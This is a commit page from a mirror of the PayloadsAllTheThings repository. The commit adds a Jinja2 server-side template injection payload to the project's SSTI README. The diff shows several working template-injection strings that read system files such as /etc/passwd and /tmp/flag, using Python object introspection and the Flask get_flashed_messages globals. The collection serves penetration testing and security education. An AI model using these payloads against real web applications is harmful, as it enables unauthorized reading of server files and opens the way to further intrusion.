ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #325 from u0pattern/u0pattern-patch-1

Browse Source 
SSTI Payload in Jinja2 - Arbitrary file read
This commit is contained in:
Swissky 2021-01-18 10:08:47 +01:00 committed by GitHub
commit 0675573d93
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
Server Side Template Injection/README.md
View File

@ -381,6 +381,8 @@ Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }}
# https://github.com/pallets/flask/blob/master/src/flask/helpers.py#L398
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
```
### Jinja2 - Write into remote file